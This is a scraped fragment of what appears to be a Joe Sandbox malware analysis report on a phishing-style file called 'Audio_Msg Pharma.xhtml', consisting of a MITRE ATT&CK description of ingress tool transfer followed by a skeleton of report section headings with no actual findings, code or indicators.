Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #Ud83d#Udd0aAudio_Msg Pharma.xhtml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 56

Chrome Cache Entry: 57

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Static File Info

General

File Icon

Static OLE Info

General

OLE File "#Ud83d#Udd0aAudio_Msg Pharma.xhtml"

Indicators

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
#Ud83d#Udd0aAudio_Msg Pharma.xhtml